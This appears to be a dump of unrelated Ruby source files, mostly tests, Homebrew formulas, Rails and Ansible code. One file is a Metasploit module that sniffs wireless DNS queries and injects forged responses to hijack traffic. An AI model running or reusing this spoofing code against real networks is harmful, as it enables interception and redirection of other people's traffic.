Object::Quux.send :remove_const, :Application
Object.send :remove_const, :Quux
Object.send :remove_const, :Rails
end
end
test "generate should omit title if set to false" do
create_simple_domain
assert_equal "", diagram(:title => false).graph.graph[:label].to_s
end
test "generate should create node for each entity" do
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_equal ["m_Bar", "m_Foo"], find_dot_nodes(diagram).map(&:id).sort
end
test "generate should add html label for entities" do
RailsERD.options.markup = true
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_match %r{<\w+.*?>Bar</\w+>}, find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add record label for entities" do
RailsERD.options.markup = false
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar"
assert_equal %Q("{Bar}"), find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add attributes to entity html labels" do
RailsERD.options.markup = true
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :column => :string
assert_match %r{<\w+.*?>column <\w+.*?>string</\w+.*?>}, find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should add attributes to entity record labels" do
RailsERD.options.markup = false
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :column => :string, :column_two => :boolean
assert_equal %Q("{Bar|column (string)\\ncolumn_two (boolean)\\n}"), find_dot_node(diagram, "m_Bar")[:label].to_gv
end
test "generate should not add any attributes to entity labels if attributes is set to false" do
create_model "Jar", :contents => :string
create_model "Lid", :jar => :references do
belongs_to :jar
end
assert_no_match %r{contents}, find_dot_node(diagram(:attributes => false), "m_Jar")[:label].to_gv
end
test "node html labels should have direction reversing braces for horizontal orientation" do
RailsERD.options.markup = true
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A<\{\s*<.*\|.*>\s*\}>\Z)m, find_dot_node(diagram(:orientation => :horizontal), "m_Author")[:label].to_gv
end
test "node html labels should not have direction reversing braces for vertical orientation" do
RailsERD.options.markup = true
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A<\s*<.*\|.*>\s*>\Z)m, find_dot_node(diagram(:orientation => :vertical), "m_Author")[:label].to_gv
end
test "node record labels should have direction reversing braces for horizontal orientation" do
RailsERD.options.markup = false
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A"\{\w+\|.*\}"\Z)m, find_dot_node(diagram(:orientation => :horizontal), "m_Author")[:label].to_gv
end
test "node record labels should not have direction reversing braces for vertical orientation" do
RailsERD.options.markup = false
create_model "Book", :author => :references do
belongs_to :author
end
create_model "Author", :name => :string
assert_match %r(\A"\w+\|.*"\Z)m, find_dot_node(diagram(:orientation => :vertical), "m_Author")[:label].to_gv
end
test "generate should create edge for each relationship" do
create_model "Foo", :bar => :references do
belongs_to :bar
end
create_model "Bar", :foo => :references do
belongs_to :foo
end
assert_equal [["m_Bar", "m_Foo"], ["m_Foo", "m_Bar"]], find_dot_node_pairs(diagram).sort
end
test "generate should create edge to polymorphic entity if polymorphism is true" do
create_model "Cannon", :defensible => :references do
belongs_to :defensible, :polymorphic => true
end
create_model "Stronghold" do
has_many :cannons, :as => :defensible
end
create_model "Galleon" do
has_many :cannons, :as => :defensible
end
assert_equal [["m_Defensible", "m_Cannon"], ["m_Defensible", "m_Galleon"], ["m_Defensible", "m_Stronghold"]],
find_dot_node_pairs(diagram(:polymorphism => true)).sort
end
test "generate should create edge to each child of polymorphic entity if polymorphism is false" do
create_model "Cannon", :defensible => :references do
belongs_to :defensible, :polymorphic => true
end
create_model "Stronghold" do
has_many :cannons, :as => :defensible
end
create_model "Galleon" do
has_many :cannons, :as => :defensible
end
assert_equal [["m_Galleon", "m_Cannon"], ["m_Stronghold", "m_Cannon"]], find_dot_node_pairs(diagram).sort
end
test "generate should create edge to abstract entity if polymorphism is true" do
create_model "Person", :settlement => :references
create_model "Country" do
has_many :settlements
end
create_model "Settlement" do
self.abstract_class = true
belongs_to :country
has_many :people
end
create_model "City", Settlement, :country => :references
assert_equal [["m_Country", "m_Settlement"], ["m_Settlement", "m_City"], ["m_Settlement", "m_Person"]],
find_dot_node_pairs(diagram(:polymorphism => true)).sort
end
test "generate should create edge to each child of abstract entity if polymorphism is false" do
create_model "Person", :settlement => :references
create_model "Country" do
has_many :settlements
end
create_model "Settlement" do
self.abstract_class = true
belongs_to :country
has_many :people
end
create_model "City", Settlement, :country => :references
assert_equal [["m_City", "m_Person"], ["m_Country", "m_City"]], find_dot_node_pairs(diagram).sort
end
# Simple notation style ====================================================
test "generate should use no style for one to one cardinalities with simple notation" do
create_one_to_one_assoc_domain
assert_equal [["none", "none"]], find_dot_edge_styles(diagram(:notation => :simple))
end
test "generate should use normal arrow head for one to many cardinalities with simple notation" do
create_one_to_many_assoc_domain
assert_equal [["none", "normal"]], find_dot_edge_styles(diagram(:notation => :simple))
end
test "generate should use normal arrow head and tail for many to many cardinalities with simple notation" do
create_many_to_many_assoc_domain
assert_equal [["normal", "normal"]], find_dot_edge_styles(diagram(:notation => :simple))
end
# Advanced notation style ==================================================
test "generate should use open dots for one to one cardinalities with bachman notation" do
create_one_to_one_assoc_domain
assert_equal [["odot", "odot"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use dots for mandatory one to one cardinalities with bachman notation" do
create_one_to_one_assoc_domain
One.class_eval do
validates_presence_of :other
end
assert_equal [["dot", "odot"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and open dot head with dot tail for one to many cardinalities with bachman notation" do
create_one_to_many_assoc_domain
assert_equal [["odot", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and dot head for mandatory one to many cardinalities with bachman notation" do
create_one_to_many_assoc_domain
One.class_eval do
validates_presence_of :many
end
assert_equal [["dot", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and open dot head and tail for many to many cardinalities with bachman notation" do
create_many_to_many_assoc_domain
assert_equal [["odotnormal", "odotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
test "generate should use normal arrow and dot tail and head for mandatory many to many cardinalities with bachman notation" do
create_many_to_many_assoc_domain
Many.class_eval do
validates_presence_of :more
end
More.class_eval do
validates_presence_of :many
end
assert_equal [["dotnormal", "dotnormal"]], find_dot_edge_styles(diagram(:notation => :bachman))
end
# Crows-foot notation style ================================================
test "generate should use 0/1 crowsfeet for one to one cardinalities with crowsfoot notation" do
create_one_to_one_assoc_domain
assert_equal [["teeodot", "teeodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 1/1 crowsfeet for mandatory one to one cardinalities with crowsfoot notation" do
create_one_to_one_assoc_domain
One.class_eval do
validates_presence_of :other
end
assert_equal [["teeodot","teetee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* crowsfeet with 0/1 crowsfeet for one to many cardinalities with crowsfoot notation" do
create_one_to_many_assoc_domain
assert_equal [["teeodot", "crowodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* crowsfeet with 1/1 crowsfett for mandatory one to many cardinalities with crowsfoot notation" do
create_one_to_many_assoc_domain
One.class_eval do
validates_presence_of :many
end
assert_equal [["teeodot", "crowtee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 0/* and 0/* crowsfeet for many to many cardinalities with crowsfoot notation" do
create_many_to_many_assoc_domain
assert_equal [["crowodot", "crowodot"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
test "generate should use 1/* and 1/* tail and head for mandatory many to many cardinalities with crowsfoot notation" do
create_many_to_many_assoc_domain
Many.class_eval do
validates_presence_of :more
end
More.class_eval do
validates_presence_of :many
end
assert_equal [["crowtee", "crowtee"]], find_dot_edge_styles(diagram(:notation => :crowsfoot))
end
end
| 35.151899 | 129 | 0.691634 |
6ae0b313dd9dec34ca20ca33db601bf41b39157d | 260 |
# Be sure to restart your server when you modify this file.
# Add new mime types for use in respond_to blocks:
# Mime::Type.register "text/richtext", :rtf
# Mime::Type.register_alias "text/html", :iphone
Mime::Type.register "application/vnd.ms-excel", :xls
| 28.888889 | 59 | 0.738462 |
e23c9c15960e3cabf0135ce8376a7dcc8c519e84 | 629 | class FontD2coding < Formula
version "1.3.2,20180524"
sha256 "0f1c9192eac7d56329dddc620f9f1666b707e9c8ed38fe1f988d0ae3e30b24e6"
url "https://github.com/naver/d2codingfont/releases/download/VER#{version.to_s.sub(/,.*/, "")}/D2Coding-Ver#{version.to_s.sub(/,.*/, "")}-#{version.to_s.sub(/.*,/, "")}.zip"
desc "D2 Coding"
homepage "https://github.com/naver/d2codingfont"
def install
parent = File.dirname(Dir.pwd) != (ENV['HOMEBREW_TEMP'] || '/tmp') ? '../' : ''
(share/"fonts").install "#{parent}D2Coding/D2Coding-Ver#{version.to_s.sub(/,.*/, "")}-#{version.to_s.sub(/.*,/, "")}.ttc"
end
test do
end
end
| 44.928571 | 175 | 0.655008 |
b9c445981fee14e7879c609e349e6e39369840fc | 970 | class Detekt < Formula
desc "Static code analysis for Kotlin"
homepage "https://github.com/detekt/detekt"
url "https://jcenter.bintray.com/io/gitlab/arturbosch/detekt/detekt-cli/1.9.1/detekt-cli-1.9.1-all.jar"
sha256 "42937cb0284e2b8af99901bd9debde0c15899c06732cb350f0617885f445b5dd"
bottle :unneeded
depends_on "openjdk"
def install
libexec.install "detekt-cli-#{version}-all.jar"
(bin/"detekt").write <<~EOS
#!/bin/bash
exec "#{Formula["openjdk"].opt_bin}/java" -jar "#{libexec}/detekt-cli-#{version}-all.jar" "$@"
EOS
end
test do
(testpath/"input.kt").write <<~EOS
fun main() {
}
EOS
(testpath/"detekt.yml").write <<~EOS
empty-blocks:
EmptyFunctionBlock:
active: true
EOS
system bin/"detekt", "--input", "input.kt", "--report", "txt:output.txt", "--config", "detekt.yml"
assert_equal "EmptyFunctionBlock", shell_output("cat output.txt").slice(/\w+/)
end
end
| 28.529412 | 105 | 0.651546 |
1c4a347a24cb29a7ae821c565dab53dff0f26594 | 1,703 | # frozen_string_literal: true
# Cloud Foundry Java Buildpack
# Copyright 2013-2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'
module JavaBuildpack
module Framework
# Encapsulates the functionality for enabling the Postgres JDBC client.
class PostgresqlJDBC < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_jar
@droplet.additional_libraries << (@droplet.sandbox + jar_name)
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
@droplet.additional_libraries << (@droplet.sandbox + jar_name)
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
service? && !driver?
end
private
def driver?
(@application.root + '**/postgresql-*.jar').glob.any?
end
def service?
@application.services.one_service?(/postgres/, 'uri')
end
end
end
end
| 28.864407 | 81 | 0.715208 |
ed61266a9ecdd8c5e59757e0d7bf43ea7cbe22e6 | 668 | module Gridinit
module Jmeter
class DSL
def simple_config_element(params={}, &block)
node = Gridinit::Jmeter::SimpleConfigElement.new(params)
attach_node(node, &block)
end
end
class SimpleConfigElement
attr_accessor :doc
include Helper
def initialize(params={})
params[:name] ||= 'SimpleConfigElement'
@doc = Nokogiri::XML(<<-EOS.strip_heredoc)
<ConfigTestElement guiclass="SimpleConfigGui" testclass="ConfigTestElement" testname="#{params[:name]}" enabled="true"/>)
EOS
update params
update_at_xpath params if params[:update_at_xpath]
end
end
end
end
| 24.740741 | 121 | 0.655689 |
1c7e1bbaa35b5fa08b4b851013b9f884d790ada9 | 3,247 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# Manages BIG-IQ applications used for load balancing an HTTPS application on port 443 with SSL offloading on BIG-IP.
class Bigiq_application_https_offload < Base
# @return [String] Name of the new application.
attribute :name
validates :name, presence: true, type: String
# @return [String, nil] Description of the application.
attribute :description
validates :description, type: String
# @return [Array<Hash>, Hash, nil] A list of servers that the application is hosted on.,If you are familiar with other BIG-IP setting, you might also refer to this list as the list of pool members.,When creating a new application, at least one server is required.
attribute :servers
validates :servers, type: TypeGeneric.new(Hash)
# @return [Hash, nil] Settings to configure the virtual which will receive the inbound connection.,This virtual will be used to host the HTTPS endpoint of the application.,Traffic destined to the C(redirect_virtual) will be offloaded to this parameter to ensure that proper redirection from insecure, to secure, occurs.
attribute :inbound_virtual
validates :inbound_virtual, type: Hash
# @return [Hash, nil] Settings to configure the virtual which will receive the connection to be redirected.,This virtual will be used to host the HTTP endpoint of the application.,Traffic destined to this parameter will be offloaded to the C(inbound_virtual) parameter to ensure that proper redirection from insecure, to secure, occurs.
attribute :redirect_virtual
validates :redirect_virtual, type: Hash
# @return [Object, nil] Specifies the SSL profile for managing client-side SSL traffic.
attribute :client_ssl_profile
# @return [String, nil] Specifies the name of service environment or the hostname of the BIG-IP that the application will be deployed to.,When creating a new application, this parameter is required.
attribute :service_environment
validates :service_environment, type: String
# @return [Symbol, nil] Collects statistics of the BIG-IP that the application is deployed to.,This parameter is only relevant when specifying a C(service_environment) which is a BIG-IP; not an SSG.
attribute :add_analytics
validates :add_analytics, type: Symbol
# @return [:absent, :present, nil] The state of the resource on the system.,When C(present), guarantees that the resource exists with the provided attributes.,When C(absent), removes the resource from the system.
attribute :state
validates :state, expression_inclusion: {:in=>[:absent, :present], :message=>"%{value} needs to be :absent, :present"}, allow_nil: true
# @return [Boolean, nil] If the module should wait for the application to be created, deleted or updated.
attribute :wait
validates :wait, expression_inclusion: {:in=>[true, false], :message=>"%{value} needs to be true, false"}, allow_nil: true
end
end
end
end
| 61.264151 | 344 | 0.724361 |
28eefcd4fb22c2cb67b7c3836c0a490a64cd6dca | 121 | class PfeedDelivery < ActiveRecord::Base
belongs_to :pfeed_receiver, :polymorphic => true
belongs_to :pfeed_item
end
| 24.2 | 50 | 0.793388 |
abd8b1182ef6c7806dbc7e08f719d93df440dfd5 | 254 | # typed: true
class CreateWizards < ActiveRecord::Migration[6.0]
def change
create_table :wizards do |t|
t.string :name
t.integer :house
t.string :parent_email
t.text :notes
t.timestamps null: false
end
end
end
| 18.142857 | 50 | 0.641732 |
f8f550e79b252dcf885926c0bee643ddb41f078f | 1,754 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = true
# Configure static file server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Randomize the order test cases are executed.
config.active_support.test_order = :random
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 40.790698 | 85 | 0.775371 |
28fe6033851945b7f4a5d2f75815780a3737ebda | 338 | class CreateTowingTractorDockerContainers < ActiveRecord::Migration[5.1]
def change
create_table :towing_tractor_docker_containers do |t|
t.integer :image_id
t.integer :server_id
t.string :container_id
t.text :env
t.text :cmd
t.timestamp :last_keepalived_at
t.timestamps
end
end
end
| 22.533333 | 72 | 0.695266 |
61a68e5b5e35f177a237891e65400f4317c9bfed | 3,474 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'yaml'
require 'net/dns/packet'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DNSpwn DNS Hijack',
'Description' => %q{
Race DNS responses and replace DNS queries
},
'Author' => ['dragorn'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement",
File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml")
]),
OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]),
OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]),
OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]),
OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]),
OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]),
], self.class)
end
def run
@dnslist = datastore['DNSLIST']
@regex = datastore['MATCH']
@response = datastore['IP']
@filter = datastore['FILTER']
@duration = datastore['DURATION']
@useyaml = datastore['USEDNSFILE']
@dns = []
if @useyaml
begin
@dns = YAML::load_file(@dnslist)
rescue ::Exception => e
print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
end
else
@dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration }
end
@run = true
open_wifi
self.wifi.filter = @filter if not @filter.empty?
each_packet do |pkt|
d3 = pkt.dot3
next if not d3
p = PacketFu::Packet.parse(d3) rescue nil
next unless p.is_udp?
dns = Net::DNS::Packet::parse(p.payload) rescue nil
next unless dns
next if dns.answer.size != 0
next if dns.question.size == 0
@dns.each do |r|
hit = nil
r['regex'].each do |reg|
hit = dns.question[0].qName.scan(/#{reg}/) || nil
break if hit.size != 0
end
next if hit.size.zero?
print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ])
injpkt = Lorcon::Packet.new()
injpkt.bssid = pkt.bssid
response_pkt = PacketFu::UDPPacket.new
response_pkt.eth_daddr = p.eth_saddr
response_pkt.eth_saddr = p.eth_daddr
response_pkt.ip_saddr = p.ip_daddr
response_pkt.ip_daddr = p.ip_saddr
response_pkt.ip_ttl = p.ip_ttl
response_pkt.udp_sport = p.udp_dport
response_pkt.udp_dport = p.udp_sport
dns.header.qr = 1
dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"])
response_pkt.payload = dns.data
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS)
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS)
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
else
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
end
self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error)
end
end
end
end
| 28.243902 | 133 | 0.64882 |
d58fce28b1d961572bb649f790bac376d470db39 | 137 | # frozen_string_literal: true
# :nodoc:
class ApplicationController < ActionController::Base
before_action :authenticate_account!
end
| 19.571429 | 52 | 0.817518 |
3363bf1a4d498244eabb9d5e13bd491a56029b1b | 103 | $LOAD_PATH.unshift File.expand_path("../lib", __dir__)
require "tictactoe"
require "minitest/autorun"
| 20.6 | 54 | 0.76699 |
1cec3374f7aba915205157aeb4a39688fc03bc42 | 117 | Rp::AvailableReport.seed(:id,
{id: 1, code: 'report 1'},
{id: 2, code: 'report 2'},
{id: 3, code: 'report 3'}
) | 23.4 | 29 | 0.555556 |
bf9f376cd9622ba1b24aca1e03999512938e468e | 791 | Pod::Spec.new do |s|
s.name = 'ZLPhotoBrowser'
s.version = '2.5.1'
s.summary = 'A simple way to multiselect photos from ablum, force touch to preview photo, support portrait and landscape, edit photo, multiple languages(Chinese,English,Japanese)'
s.homepage = 'https://github.com/longitachi/ZLPhotoBrowser'
s.license = 'MIT'
s.platform = :ios
s.author = {'longitachi' => '[email protected]'}
s.ios.deployment_target = '8.0'
s.source = {:git => 'https://github.com/longitachi/ZLPhotoBrowser.git', :tag => s.version}
s.source_files = 'PhotoBrowser/*.{h,m}'
s.resources = 'PhotoBrowser/resource/*.{png,xib,nib,bundle}'
s.requires_arc = true
s.frameworks = 'UIKit','Photos','PhotosUI'
s.dependency 'SDWebImage'
end
| 39.55 | 186 | 0.656131 |
e9b8cf26861fa2af333f7320227dea33dd81d56f | 449 | # frozen_string_literal: true
require 'simplecov'
SimpleCov.start do
add_filter '/test/'
enable_coverage :branch
end
$LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'hollaback'
require 'minitest/autorun'
class Callbacker
attr_reader :name
def initialize(name)
@name = name
end
def say(&_block)
puts yield
end
def say_hello
puts 'hello'
end
def say_goodbye
puts "goodbye-#{name}"
end
end
| 13.205882 | 54 | 0.701559 |
5d78b794e59ec4192dea7e2a5bd8eaf162f1e2fa | 172 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe ApplicationBatch, type: :batch do
it { is_expected.to inherit_from BatchProcessor::BatchBase }
end
| 19.111111 | 62 | 0.796512 |
e22d33941533ef79058c630e9f723ca2ac9fb44d | 2,316 | require File.expand_path('../helper', __FILE__)
begin
require 'coffee-script'
require 'execjs'
begin
ExecJS.compile '1'
rescue Exception
raise LoadError, 'unable to execute JavaScript'
end
class CoffeeTest < Test::Unit::TestCase
def coffee_app(options = {}, &block)
mock_app do
set :views, File.dirname(__FILE__) + '/views'
set(options)
get('/', &block)
end
get '/'
end
it 'renders inline Coffee strings' do
coffee_app { coffee "alert 'Aye!'\n" }
assert ok?
assert body.include?("alert('Aye!');")
end
it 'defaults content type to javascript' do
coffee_app { coffee "alert 'Aye!'\n" }
assert ok?
assert_equal "application/javascript;charset=utf-8", response['Content-Type']
end
it 'defaults allows setting content type per route' do
coffee_app do
content_type :html
coffee "alert 'Aye!'\n"
end
assert ok?
assert_equal "text/html;charset=utf-8", response['Content-Type']
end
it 'defaults allows setting content type globally' do
coffee_app(:coffee => { :content_type => 'html' }) do
coffee "alert 'Aye!'\n"
end
assert ok?
assert_equal "text/html;charset=utf-8", response['Content-Type']
end
it 'renders .coffee files in views path' do
coffee_app { coffee :hello }
assert ok?
assert_include body, "alert(\"Aye!\");"
end
it 'ignores the layout option' do
coffee_app { coffee :hello, :layout => :layout2 }
assert ok?
assert_include body, "alert(\"Aye!\");"
end
it "raises error if template not found" do
mock_app {
get('/') { coffee :no_such_template }
}
assert_raise(Errno::ENOENT) { get('/') }
end
it "passes coffee options to the coffee engine" do
coffee_app { coffee "alert 'Aye!'\n", :no_wrap => true }
assert ok?
assert_body "alert('Aye!');"
end
it "passes default coffee options to the coffee engine" do
mock_app do
set :coffee, :no_wrap => true # default coffee style is :nested
get('/') { coffee "alert 'Aye!'\n" }
end
get '/'
assert ok?
assert_body "alert('Aye!');"
end
end
rescue LoadError
warn "#{$!.to_s}: skipping coffee tests"
rescue
if $!.class.name == 'ExecJS::RuntimeUnavailable'
warn "#{$!.to_s}: skipping coffee tests"
else
raise
end
end
| 23.876289 | 81 | 0.639465 |
b98ff0bf53a1294747d27d39732d6450ccda69bd | 1,059 | require 'json'
require 'octokit'
module Gitload
module Sources
class GitHub
include Source
def initialize config, options = {}
@config = config
::Octokit.configure do |c|
c.auto_paginate = true
c.access_token = options.fetch :access_token, ENV['GITLOAD_GITHUB_TOKEN']
end
end
def repos
puts 'Loading GitHub projects...'
data = @config.load_or_cache_data 'github' do
Utils.stringify_keys ::Octokit.repositories.collect(&:to_attrs)
end
data.collect{ |d| Repo.new d }
end
class Repo < Gitload::Repo
def initialize api_data
super :github, api_data
@name = api_data['name']
@owner = api_data['owner']['login']
@owner_type = api_data['owner']['type']
@fork = api_data['fork']
@clone_urls[:git] = api_data['git_url']
@clone_urls[:ssh] = api_data['ssh_url']
@clone_urls[:http] = api_data['clone_url']
end
end
end
end
end
| 23.021739 | 83 | 0.574127 |
79f6a05e88405cf6121c4c58434dec7e3d7e174e | 466 | cask 'folx' do
version '4.2.13332'
sha256 '5664c147dc0b848a2705659a206b02293e4b97f13dc1b5976a6e3435f1c41708'
url "http://www.eltima.com/download/folx-update/downloader_mac_#{version}.dmg"
appcast 'http://mac.eltima.com/download/folx-updater/folx.xml',
:checkpoint => '5842b05fba51144ad903c431987cb91de8876703065f3ab6801e2de0f7eb2a88'
name 'Folx'
homepage 'http://mac.eltima.com/download-manager.html'
license :freemium
app 'Folx.app'
end
| 33.285714 | 91 | 0.76824 |
f8f26bcb47ec8030dd4f789e45aa74f0ade99f17 | 442 | # frozen_string_literal: true
module RDF
module Serializers
class ListSerializer
include RDF::Serializers::ObjectSerializer
def hextuples_for_collection
@resource.map do |resource|
RDF::Serializers.serializer_for(resource).record_hextuples(resource, nil, @includes, @params)
end.flatten(1)
end
class << self
def validate_includes!(_includes); end
end
end
end
end
| 22.1 | 103 | 0.676471 |
1a9b354fbc5894669cfab1f8ead7a35146358390 | 659 | # frozen_string_literal: true
class Reviewable < ActiveRecord::Base
class Collection
class Item
include ActiveModel::Serialization
attr_reader :id
def initialize(id)
@id = id
end
end
def initialize(reviewable, guardian, args = nil)
args ||= {}
@reviewable, @guardian, @args = reviewable, guardian, args
@content = []
end
def has?(id)
@content.any? { |a| a.id.to_s == id.to_s }
end
def blank?
@content.blank?
end
def present?
!blank?
end
def each
@content.each { |i| yield i }
end
def to_a
@content
end
end
end
| 15.690476 | 64 | 0.564492 |
39a04162d9f9f79adefe31b8efef9d7e6093e5eb | 503 | require 'spec_helper'
describe 'Google Chrome' do
before(:all) do
@selenium = Selenium::WebDriver.for(:remote, url: "http://localhost:4444/wd/hub", desired_capabilities: :chrome)
end
after(:all) do
@selenium.quit
end
res = '1366 x 768'
it "should return display resolution of #{res}" do
@selenium.get 'http://www.whatismyscreenresolution.com/'
element = @selenium.find_element(:id, 'resolutionNumber')
expect(element.text).to eq(res)
end
end unless ENV['APPVEYOR']
| 25.15 | 116 | 0.695825 |
8776861672b168aa9f17ca356d60fb871547f2f5 | 376 | module Intouch::Protocols
class Base
def handle_update(update)
raise NotImplementedError
end
def send_regular_notification(issue, state)
raise NotImplementedError
end
protected
def need_group_message?(journal)
journal.blank? || (journal.details.pluck(:prop_key) & %w[priority_id status_id project_id]).present?
end
end
end
| 20.888889 | 106 | 0.712766 |
f8e56b5ac4b4a4adbf2225c49ee3570539723b60 | 851 |
require_relative 'conway_cubes'
describe 'ConwayCube', :day17 do
def with_data(file_path)
cur_dir = File.dirname(__FILE__)
f = File.open(File.join(cur_dir, file_path))
lines = f.readlines.map(&:strip)
ConwayCube.new(lines)
end
it 'should be able to handle example data for part one' do
ex = with_data('fixtures/example.txt')
expect(ex.calc_part_one).to eq(112)
end
it 'should be able to handle input data for part one' do
ex = with_data('fixtures/input.txt')
expect(ex.calc_part_one).to eq(313)
end
it 'should be able to handle example data for part two' do
ex = with_data('fixtures/example.txt')
expect(ex.calc_part_two).to eq(848)
end
it 'should be able to handle input data for part two' do
ex = with_data('fixtures/input.txt')
expect(ex.calc_part_two).to eq(2640)
end
end
| 25.787879 | 60 | 0.696827 |
112a8c985f34edec7e89aa08dba69eb599114c78 | 515 | name 'php'
maintainer 'Sous Chefs'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs and maintains php and php modules'
source_url 'https://github.com/sous-chefs/php'
issues_url 'https://github.com/sous-chefs/php/issues'
chef_version '>= 14.0'
version '8.0.0'
depends 'yum-epel'
supports 'amazon', '>= 2.0'
supports 'centos', '>= 7.0'
supports 'debian', '>= 9.0'
supports 'oracle', '>= 7.0'
supports 'redhat', '>= 7.0'
supports 'scientific', '>= 7.0'
supports 'ubuntu', '>= 16.04'
| 25.75 | 56 | 0.68932 |
e29c7b33d09088e8f93e4268b93444f2a8cffcf8 | 6,477 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::TrafficManager::Mgmt::V2018_02_01
module Models
#
# Class representing a Traffic Manager endpoint.
#
class Endpoint < ProxyResource
include MsRestAzure
# @return [String] The Azure Resource URI of the of the endpoint. Not
# applicable to endpoints of type 'ExternalEndpoints'.
attr_accessor :target_resource_id
# @return [String] The fully-qualified DNS name of the endpoint. Traffic
# Manager returns this value in DNS responses to direct traffic to this
# endpoint.
attr_accessor :target
# @return [EndpointStatus] The status of the endpoint. If the endpoint is
# Enabled, it is probed for endpoint health and is included in the
# traffic routing method. Possible values include: 'Enabled', 'Disabled'
attr_accessor :endpoint_status
# @return [Integer] The weight of this endpoint when using the 'Weighted'
# traffic routing method. Possible values are from 1 to 1000.
attr_accessor :weight
# @return [Integer] The priority of this endpoint when using the
# ‘Priority’ traffic routing method. Possible values are from 1 to 1000,
# lower values represent higher priority. This is an optional parameter.
# If specified, it must be specified on all endpoints, and no two
# endpoints can share the same priority value.
attr_accessor :priority
# @return [String] Specifies the location of the external or nested
# endpoints when using the ‘Performance’ traffic routing method.
attr_accessor :endpoint_location
# @return [EndpointMonitorStatus] The monitoring status of the endpoint.
